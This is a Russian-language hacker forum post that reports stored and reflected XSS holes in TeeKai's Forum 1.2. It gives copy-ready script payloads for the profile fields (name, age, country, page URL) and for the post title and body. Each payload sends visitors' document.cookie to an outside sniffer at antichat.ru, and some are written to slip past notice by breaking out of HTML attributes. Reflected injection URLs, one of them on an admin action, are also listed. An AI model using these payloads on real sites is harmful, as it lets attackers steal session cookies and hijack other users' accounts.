TeeKai's Forum version 1.2 Этот движок я нашёл у себя на халявном диске большого срока давности...Поэтому я думаю он такой и дырявый. Поставил на локалку - и в лицо брызнуло ошибками. Странно, но на оффсайте производителя я не нашёл ничего связанного с форумами... (http://www.teekai.info/) 1) Регестрируем пользователя. Лезем в профиль, вбиваем скрипт для вставки сниффера полях имени, возраста, паги и урла для неё, страны. Непалевный способ для поля url: http://ya.ru"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><a target="_blank Непалевный способ для поля name: Name"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><font size="1 Непалевный способ для поля возраста, страны и названия паги: la"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><input class="fields Теперь наш скрипт выполняется при просмотре нашего профиля (там выводятся все юзверы сразу),a также при просмотре созданной нами темы. 2) Создаём новый пост. Вставляем скрипт в поле для заголовка(title) и в поле для сообщения - оба они так и ждут, чтобы через них вставили сниффер =). <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Теперь наш скрипт выполняется при просмотре созданного топика. 3) Пассивные: http://ya.ru/tee/index.php?action=admin&cmd=manageforums&choose=deleteforums&id=[_X_S_S_] (из админки) http://ya.ru/tee/viewtopic.php?action=viewtopic&cat=[_X_S_S_]&forumname=[_X_S_S_]&command=viewtopic&name=[_X_S_S_]&date=[_X_S_S_]&time=[_X_S_S_] P.S. И снова я заранее извиняюсь, если эта инфа уже была где-то выложена до меня... Мне как всегда лень и жаль трафика проверять, первый ли я в нахождении багов...
